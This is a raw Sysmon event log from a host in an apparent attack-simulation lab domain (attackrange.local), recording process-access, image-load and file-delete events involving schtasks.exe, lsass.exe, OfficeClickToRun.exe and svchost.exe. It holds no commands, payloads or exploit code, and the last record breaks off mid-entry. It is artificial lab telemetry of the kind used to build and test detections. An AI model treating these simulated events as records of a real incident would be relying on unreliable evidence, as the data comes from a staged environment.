14:57:30.592{A7A01FEF-EBDA-607E-CB0C-00000000BB01}6348C:\Windows\System32\schtasks.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074712Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.592{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDA-607E-CB0C-00000000BB01}6348C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074711Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.592{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074710Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.592{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDA-607E-BA0C-00000000BB01}1992C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074709Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.577{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074708Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.577{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074707Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.561{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-296.datMD5=65210101B75365112ED5C9EF1A1782D6,SHA256=A667E29A45838C7035F84E989F07D25597F602A2A1E444A667B569D872C0AABE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074706Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.561{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074705Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.561{A7A01FEF-EBDA-607E-CC0C-00000000BB01}49725168C:\Windows\system32\conhost.exe{A7A01FEF-EBDA-607E-CB0C-00000000BB01}6348C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074704Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.561{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074703Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.546{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-CC0C-00000000BB01}4972C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074702Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.546{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074701Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.546{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-CB0C-00000000BB01}6348C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074700Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.530{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50923308C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EBDA-607E-CB0C-00000000BB01}6348C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108db1|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108beb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+395149|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a7fcf|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+43494a|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+434cc5|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+47afbb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074699Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.530{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-C90C-00000000BB01}4532C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074698Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.530{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-C90C-00000000BB01}4532C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074697Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.530{A7A01FEF-EBDA-607E-C90C-00000000BB01}4532C:\Windows\System32\schtasks.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074696Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.530{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDA-607E-C90C-00000000BB01}4532C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074695Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.530{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074694Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.514{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074693Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.514{A7A01FEF-EBDA-607E-CA0C-00000000BB01}71404360C:\Windows\system32\conhost.exe{A7A01FEF-EBDA-607E-C90C-00000000BB01}4532C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074692Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.514{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074691Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.499{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-CA0C-00000000BB01}7140C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074690Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.499{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074689Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.483{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074688Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.483{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074687Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.483{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-218.datMD5=4A5A7B29A34C177435224E58BB7B44BD,SHA256=BB8227948872552698F5A5CD8D3C6C4C4D71E8E4F82C2BAB22EDCF57597D2B76,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074686Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.467{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-C90C-00000000BB01}4532C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074685Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50923308C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EBDA-607E-C90C-00000000BB01}4532C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108db1|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108beb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+39526d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+3953a3|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a81f4|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+434879|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+434cc5|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+47afbb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074684Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.452{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074683Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.452{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074682Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.452{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074681Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.452{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-C70C-00000000BB01}4472C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074680Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.452{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-C70C-00000000BB01}4472C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074679Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.436{A7A01FEF-EBDA-607E-C70C-00000000BB01}4472C:\Windows\System32\schtasks.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074678Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.436{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft 